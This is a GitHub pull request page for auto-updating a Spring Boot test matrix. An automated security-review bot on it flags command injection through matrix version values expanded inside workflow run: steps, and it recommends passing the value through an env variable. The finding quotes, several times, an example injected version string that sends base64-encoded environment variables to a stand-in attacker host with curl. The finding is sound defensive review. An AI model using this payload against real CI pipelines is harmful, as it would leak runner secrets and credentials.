Skip to content

Auto update Test Matrix for Spring Boot #4743

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Draft
adinauer wants to merge 17 commits into
base: main
Choose a base branch
from
+1,968 −3

ci: Extract Spring Boot version updater script

8309e2e
Select commit
Loading
Failed to load commit list.
Draft

Auto update Test Matrix for Spring Boot #4743

ci: Extract Spring Boot version updater script
8309e2e
Select commit
Loading
Failed to load commit list.
@sentry/warden / warden: security-review completed May 28, 2026 in 8m 20s

1 issue

security-review: Found 1 issue (1 medium)

Medium

PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection - `.github/workflows/spring-boot-4-matrix.yml:24-39`

.github/data/spring-boot-3-versions.json (modifiable in a PR) is read by the load-versions job and passed into the matrix; the Update Spring Boot 3.x version step then expands ${{ matrix.springboot-version }} directly inside a run: block. A crafted value such as 3.4.1"; curl https://attacker/$(env | base64) # becomes injected shell on the runner. Move the value to an env: variable (e.g. SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}) and reference $SPRINGBOOT_VERSION instead. The identical pattern exists in spring-boot-2-matrix.yml and spring-boot-4-matrix.yml.

Also found at:

  • .github/workflows/spring-boot-2-matrix.yml:39

⏱ 6m 56s · 543.7k in / 56.8k out · $2.31

Annotations

Check warning on line 39 in .github/workflows/spring-boot-4-matrix.yml

See this annotation in the file changed.

@sentry-warden sentry-warden / warden: security-review

PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection 

`.github/data/spring-boot-3-versions.json` (modifiable in a PR) is read by the `load-versions` job and passed into the matrix; the `Update Spring Boot 3.x version` step then expands `${{ matrix.springboot-version }}` directly inside a `run:` block. A crafted value such as `3.4.1"; curl https://attacker/$(env | base64) #` becomes injected shell on the runner. Move the value to an `env:` variable (e.g. `SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}`) and reference `$SPRINGBOOT_VERSION` instead. The identical pattern exists in `spring-boot-2-matrix.yml` and `spring-boot-4-matrix.yml`.

Check warning on line 39 in .github/workflows/spring-boot-2-matrix.yml

See this annotation in the file changed.

@sentry-warden sentry-warden / warden: security-review

[JNS-EE5] PR-controlled JSON version file flows into shell `run:` step via matrix expression, enabling command injection (additional location) 

`.github/data/spring-boot-3-versions.json` (modifiable in a PR) is read by the `load-versions` job and passed into the matrix; the `Update Spring Boot 3.x version` step then expands `${{ matrix.springboot-version }}` directly inside a `run:` block. A crafted value such as `3.4.1"; curl https://attacker/$(env | base64) #` becomes injected shell on the runner. Move the value to an `env:` variable (e.g. `SPRINGBOOT_VERSION: ${{ matrix.springboot-version }}`) and reference `$SPRINGBOOT_VERSION` instead. The identical pattern exists in `spring-boot-2-matrix.yml` and `spring-boot-4-matrix.yml`.
View more details on @sentry/warden